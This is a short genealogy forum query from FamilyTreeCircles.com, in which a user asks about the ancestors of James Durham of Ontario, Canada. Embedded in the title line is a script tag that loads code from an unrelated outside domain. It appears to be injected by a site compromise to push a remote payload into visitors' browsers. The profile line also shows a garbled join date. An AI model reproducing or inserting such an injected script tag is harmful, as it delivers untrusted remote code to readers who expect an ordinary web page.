Looking for ancestors of my great, great, great grandfather, James Dur...<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script> :: FamilyTreeCircles.com Genealogy
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Looking for ancestors of my great, great, great grandfather, James Dur...

Query by bisa

Looking for ancestors of my great, great, great grandfather, James Durham of Ontario, Canada. I don't know if he was the one who left England for Canada, or if it was an earlier ancestor. I also don't know my great, great, great, great grandfather Durham's first and middle name, if he was born in England or Ontario, Canada, or where in England or Canada, or on what date in what year.

Surnames: DURHAM
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by bisa Profile | Research | Contact | Subscribe | Block this user
on 2004-11-16 20:25:59

bisa has been a Family Tree Circles member since Nov -0001. is researching the following names: DURHAM.

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